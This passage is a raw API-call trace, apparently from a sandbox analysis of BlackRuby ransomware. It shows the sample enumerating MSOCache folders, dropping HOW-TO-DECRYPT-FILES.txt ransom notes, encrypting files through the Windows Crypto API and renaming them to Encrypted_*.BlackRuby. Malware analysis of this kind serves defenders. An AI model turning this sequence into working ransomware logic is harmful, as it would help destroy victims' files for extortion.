users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\encrypted_zj2o3kjshhbkittvxnctnerdcjlxwjdisondvwg2i.blackruby")) returned 1 [0045.898] GetLastError () returned 0xb7 [0045.898] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e838, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x57 [0045.898] GetLastError () returned 0xb7 [0045.898] SetErrorMode (uMode=0x1) returned 0x0 [0045.899] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.899] GetLastError () returned 0x5 [0045.899] SetErrorMode (uMode=0x0) returned 0x1 [0045.900] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en", lpFilePart=0x0) returned 0x47 [0045.900] GetLastError () returned 0x5 [0045.900] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.900] GetLastError () returned 0x5 [0045.900] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.900] GetLastError () returned 0x5 [0045.900] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en", lpFilePart=0x0) returned 0x47 [0045.900] GetLastError () returned 0x5 [0045.900] SetErrorMode (uMode=0x1) returned 0x0 [0045.900] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360aa0 [0045.900] GetLastError () returned 0x5 [0045.900] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.900] GetLastError () returned 0x5 [0045.900] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.900] GetLastError () returned 0x5 [0045.900] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.900] GetLastError () returned 0x5 [0045.900] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.900] GetLastError () returned 0x5 [0045.900] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.900] GetLastError () returned 0x12 [0045.900] FindClose (in: hFindFile=0x360aa0 | out: hFindFile=0x360aa0) returned 1 [0045.900] SetErrorMode (uMode=0x0) returned 0x1 [0045.900] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en", lpFilePart=0x0) returned 0x47 [0045.901] GetLastError () returned 0x12 [0045.901] SetErrorMode (uMode=0x1) returned 0x0 [0045.901] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360aa0 [0045.901] GetLastError () returned 0x12 [0045.901] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.901] GetLastError () returned 0x12 [0045.901] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.901] GetLastError () returned 0x12 [0045.901] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.901] GetLastError () returned 0x12 [0045.901] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.901] GetLastError () returned 0x12 [0045.901] FindNextFileW (in: hFindFile=0x360aa0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.901] GetLastError () returned 0x12 [0045.901] FindClose (in: hFindFile=0x360aa0 | out: hFindFile=0x360aa0) returned 1 [0045.901] SetErrorMode (uMode=0x0) returned 0x1 [0045.901] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.cab", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.cab", lpFilePart=0x0) returned 0x51 [0045.901] GetLastError () returned 0x12 [0045.901] SetErrorMode (uMode=0x1) returned 0x0 [0045.901] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.en\\proof.cab"), fInfoLevelId=0x0, lpFileInformation=0x1b9fc20 | out: lpFileInformation=0x1b9fc20*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x219b4a00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x219b4a00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x36e9b850, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xa69afd)) returned 1 [0045.902] GetLastError () returned 0x12 [0045.902] SetErrorMode (uMode=0x0) returned 0x1 [0045.903] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x60 [0045.903] GetLastError () returned 0x12 [0045.903] SetErrorMode (uMode=0x1) returned 0x0 [0045.903] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.en\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.903] GetLastError () returned 0x0 [0045.903] GetFileType (hFile=0x184) returned 0x1 [0045.903] SetErrorMode (uMode=0x0) returned 0x1 [0045.903] GetFileType (hFile=0x184) returned 0x1 [0045.903] WriteFile (in: hFile=0x184, lpBuffer=0x1bbb708*, nNumberOfBytesToWrite=0x18da, lpNumberOfBytesWritten=0x18ed2c, lpOverlapped=0x0 | out: lpBuffer=0x1bbb708*, lpNumberOfBytesWritten=0x18ed2c*=0x18da, lpOverlapped=0x0) returned 1 [0045.904] GetLastError () returned 0x0 [0045.904] CloseHandle (hObject=0x184) returned 1 [0045.904] GetLastError () returned 0x0 [0045.904] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e8f4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x60 [0045.904] GetLastError () returned 0x0 [0045.904] SetFileAttributesW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\HOW-TO-DECRYPT-FILES.txt", dwFileAttributes=0x1) returned 1 [0045.905] GetLastError () returned 0x0 [0045.905] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.msi", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.msi", lpFilePart=0x0) returned 0x51 [0045.905] GetLastError () returned 0x0 [0045.905] SetErrorMode (uMode=0x1) returned 0x0 [0045.905] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.msi" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.en\\proof.msi"), fInfoLevelId=0x0, lpFileInformation=0x1bbd43c | out: lpFileInformation=0x1bbd43c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x658e4f00, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0x658e4f00, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x36e74750, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0xa0600)) returned 1 [0045.905] GetLastError () returned 0x0 [0045.905] SetErrorMode (uMode=0x0) returned 0x1 [0045.905] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x60 [0045.905] GetLastError () returned 0x0 [0045.905] SetErrorMode (uMode=0x1) returned 0x0 [0045.906] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.en\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.906] GetLastError () returned 0x5 [0045.907] SetErrorMode (uMode=0x0) returned 0x1 [0045.907] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0045.907] GetLastError () returned 0x5 [0045.907] SetErrorMode (uMode=0x1) returned 0x0 [0045.907] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.en\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x1bdb194 | out: lpFileInformation=0x1bdb194*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb56d1600, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xb56d1600, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x36e74750, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x543)) returned 1 [0045.907] GetLastError () returned 0x5 [0045.907] SetErrorMode (uMode=0x0) returned 0x1 [0045.908] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0045.908] GetLastError () returned 0x5 [0045.908] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e7bc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0045.908] GetLastError () returned 0x5 [0045.908] SetErrorMode (uMode=0x1) returned 0x0 [0045.908] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0x80000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x3, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.908] GetLastError () returned 0x0 [0045.908] GetFileType (hFile=0x184) returned 0x1 [0045.908] SetErrorMode (uMode=0x0) returned 0x1 [0045.908] GetFileType (hFile=0x184) returned 0x1 [0045.908] GetFileSize (in: hFile=0x184, lpFileSizeHigh=0x18ed70 | out: lpFileSizeHigh=0x18ed70*=0x0) returned 0x543 [0045.908] GetLastError () returned 0x0 [0045.908] ReadFile (in: hFile=0x184, lpBuffer=0x1bdd4ac, nNumberOfBytesToRead=0x1000, lpNumberOfBytesRead=0x18ed18, lpOverlapped=0x0 | out: lpBuffer=0x1bdd4ac*, lpNumberOfBytesRead=0x18ed18*=0x543, lpOverlapped=0x0) returned 1 [0045.910] GetLastError () returned 0x0 [0045.910] CloseHandle (hObject=0x184) returned 1 [0045.910] GetLastError () returned 0x0 [0045.910] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e8cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0045.910] GetLastError () returned 0x0 [0045.910] SetErrorMode (uMode=0x1) returned 0x0 [0045.910] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.en\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ed80 | out: lpFileInformation=0x18ed80*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb56d1600, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xb56d1600, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x36e74750, ftLastWriteTime.dwHighDateTime=0x1d2da19, nFileSizeHigh=0x0, nFileSizeLow=0x543)) returned 1 [0045.910] GetLastError () returned 0x0 [0045.910] SetErrorMode (uMode=0x0) returned 0x1 [0045.910] CryptAcquireContextW (in: phProv=0x18ece0, szContainer=0x0, szProvider="Microsoft Enhanced RSA and AES Cryptographic Provider", dwProvType=0x18, dwFlags=0xf0000000 | out: phProv=0x18ece0*=0x37c680) returned 1 [0045.910] GetLastError () returned 0x0 [0045.943] CryptImportKey (in: hProv=0x37c680, pbData=0x1c38dd8, dwDataLen=0x2c, hPubKey=0x0, dwFlags=0x1, phKey=0x18ecbc | out: phKey=0x18ecbc*=0x360ce0) returned 1 [0045.943] GetLastError () returned 0x0 [0045.943] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.943] GetLastError () returned 0x0 [0045.949] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.949] GetLastError () returned 0x0 [0045.949] CryptDuplicateKey (in: hKey=0x360ce0, pdwReserved=0x0, dwFlags=0x0, phKey=0x18ec78 | out: phKey=0x18ec78*=0x360d60) returned 1 [0045.949] CryptContextAddRef (hProv=0x37c680, pdwReserved=0x0, dwFlags=0x0) returned 1 [0045.949] GetLastError () returned 0x0 [0045.949] CryptSetKeyParam (hKey=0x360d60, dwParam=0x4, pbData=0x1c65e24*=0x1, dwFlags=0x0) returned 1 [0045.949] GetLastError () returned 0x0 [0045.949] CryptSetKeyParam (hKey=0x360d60, dwParam=0x1, pbData=0x1c65df0, dwFlags=0x0) returned 1 [0045.949] GetLastError () returned 0x0 [0045.949] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c65e6c*, pdwDataLen=0x18ed08*=0x640, dwBufLen=0x640 | out: pbData=0x1c65e6c*, pdwDataLen=0x18ed08*=0x640) returned 1 [0045.949] GetLastError () returned 0x0 [0045.949] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=0, dwFlags=0x0, pbData=0x1c66b18*, pdwDataLen=0x18ed20*=0x10, dwBufLen=0x10 | out: pbData=0x1c66b18*, pdwDataLen=0x18ed20*=0x10) returned 1 [0045.949] GetLastError () returned 0x0 [0045.949] CryptEncrypt (in: hKey=0x360d60, hHash=0x0, Final=1, dwFlags=0x0, pbData=0x1c66b48*, pdwDataLen=0x18ed28*=0x0, dwBufLen=0x10 | out: pbData=0x1c66b48*, pdwDataLen=0x18ed28*=0x10) returned 1 [0045.949] GetLastError () returned 0x0 [0045.949] CryptDestroyKey (hKey=0x360ce0) returned 1 [0045.949] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.949] CryptReleaseContext (hProv=0x37c680, dwFlags=0x0) returned 1 [0045.949] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e7c4, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0045.949] GetLastError () returned 0x0 [0045.949] SetErrorMode (uMode=0x1) returned 0x0 [0045.949] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.en\\proof.xml"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0x184 [0045.950] GetLastError () returned 0xb7 [0045.950] GetFileType (hFile=0x184) returned 0x1 [0045.950] SetErrorMode (uMode=0x0) returned 0x1 [0045.950] GetFileType (hFile=0x184) returned 0x1 [0045.952] CloseHandle (hObject=0x184) returned 1 [0045.952] GetLastError () returned 0xb7 [0045.952] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml", lpFilePart=0x0) returned 0x51 [0045.952] GetLastError () returned 0xb7 [0045.952] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Encrypted_Spf2DhrX3AUNIUbiKuopvp8HNNfVl8l5qdBF5I.BlackRuby", nBufferLength=0x105, lpBuffer=0x18e8e8, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Encrypted_Spf2DhrX3AUNIUbiKuopvp8HNNfVl8l5qdBF5I.BlackRuby", lpFilePart=0x0) returned 0x82 [0045.952] GetLastError () returned 0xb7 [0045.952] SetErrorMode (uMode=0x1) returned 0x0 [0045.952] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.en\\proof.xml"), fInfoLevelId=0x0, lpFileInformation=0x18ed68 | out: lpFileInformation=0x18ed68*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0xb56d1600, ftCreationTime.dwHighDateTime=0x1cad01b, ftLastAccessTime.dwLowDateTime=0xb56d1600, ftLastAccessTime.dwHighDateTime=0x1cad01b, ftLastWriteTime.dwLowDateTime=0x2397c420, ftLastWriteTime.dwHighDateTime=0x1d39df7, nFileSizeHigh=0x0, nFileSizeLow=0x650)) returned 1 [0045.952] GetLastError () returned 0xb7 [0045.952] SetErrorMode (uMode=0x0) returned 0x1 [0045.952] MoveFileW (lpExistingFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Proof.xml" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.en\\proof.xml"), lpNewFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\Encrypted_Spf2DhrX3AUNIUbiKuopvp8HNNfVl8l5qdBF5I.BlackRuby" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.en\\encrypted_spf2dhrx3auniubikuopvp8hnnfvl8l5qdbf5i.blackruby")) returned 1 [0045.953] GetLastError () returned 0xb7 [0045.954] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\HOW-TO-DECRYPT-FILES.txt", nBufferLength=0x105, lpBuffer=0x18e7cc, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\HOW-TO-DECRYPT-FILES.txt", lpFilePart=0x0) returned 0x60 [0045.954] GetLastError () returned 0xb7 [0045.954] SetErrorMode (uMode=0x1) returned 0x0 [0045.954] CreateFileW (lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.en\\HOW-TO-DECRYPT-FILES.txt" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.en\\how-to-decrypt-files.txt"), dwDesiredAccess=0x40000000, dwShareMode=0x1, lpSecurityAttributes=0x0, dwCreationDisposition=0x2, dwFlagsAndAttributes=0x100000, hTemplateFile=0x0) returned 0xffffffff [0045.954] GetLastError () returned 0x5 [0045.955] SetErrorMode (uMode=0x0) returned 0x1 [0045.955] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es", nBufferLength=0x105, lpBuffer=0x18e994, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es", lpFilePart=0x0) returned 0x47 [0045.955] GetLastError () returned 0x5 [0045.955] GetSystemDirectoryW (in: lpBuffer=0x364560, uSize=0x104 | out: lpBuffer="C:\\Windows\\system32") returned 0x13 [0045.955] GetLastError () returned 0x5 [0045.955] GetFullPathNameW (in: lpFileName="C:\\Windows\\system32", nBufferLength=0x105, lpBuffer=0x18e8b8, lpFilePart=0x0 | out: lpBuffer="C:\\Windows\\system32", lpFilePart=0x0) returned 0x13 [0045.955] GetLastError () returned 0x5 [0045.955] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es", lpFilePart=0x0) returned 0x47 [0045.955] GetLastError () returned 0x5 [0045.955] SetErrorMode (uMode=0x1) returned 0x0 [0045.955] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ce0 [0045.956] GetLastError () returned 0x5 [0045.956] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.956] GetLastError () returned 0x5 [0045.956] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.956] GetLastError () returned 0x5 [0045.956] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.956] GetLastError () returned 0x5 [0045.956] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.956] GetLastError () returned 0x5 [0045.956] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.956] GetLastError () returned 0x12 [0045.956] FindClose (in: hFindFile=0x360ce0 | out: hFindFile=0x360ce0) returned 1 [0045.956] SetErrorMode (uMode=0x0) returned 0x1 [0045.956] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es", nBufferLength=0x105, lpBuffer=0x18e86c, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es", lpFilePart=0x0) returned 0x47 [0045.956] GetLastError () returned 0x12 [0045.956] SetErrorMode (uMode=0x1) returned 0x0 [0045.956] FindFirstFileW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\*", lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0x360ce0 [0045.956] GetLastError () returned 0x12 [0045.956] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.956] GetLastError () returned 0x12 [0045.956] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.956] GetLastError () returned 0x12 [0045.956] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.956] GetLastError () returned 0x12 [0045.957] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 1 [0045.957] GetLastError () returned 0x12 [0045.957] FindNextFileW (in: hFindFile=0x360ce0, lpFindFileData=0x364560 | out: lpFindFileData=0x364560) returned 0 [0045.957] GetLastError () returned 0x12 [0045.957] FindClose (in: hFindFile=0x360ce0 | out: hFindFile=0x360ce0) returned 1 [0045.957] SetErrorMode (uMode=0x0) returned 0x1 [0045.957] GetFullPathNameW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.cab", nBufferLength=0x105, lpBuffer=0x18e920, lpFilePart=0x0 | out: lpBuffer="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.cab", lpFilePart=0x0) returned 0x51 [0045.957] GetLastError () returned 0x12 [0045.957] SetErrorMode (uMode=0x1) returned 0x0 [0045.957] GetFileAttributesExW (in: lpFileName="C:\\MSOCache\\All Users\\{90140000-002C-0409-0000-0000000FF1CE}-C\\Proof.es\\Proof.cab" (normalized: "c:\\msocache\\all users\\{90140000-002c-0409-0000-0000000ff1ce}-c\\proof.es\\proof.cab"), fInfoLevelId=0x0, lpFileInformation=0x1c87d4c | out: lpFileInformation=0x1c87d4c*(dwFileAttributes=0x2020, ftCreationTime.dwLowDateTime=0x17dd0b00, 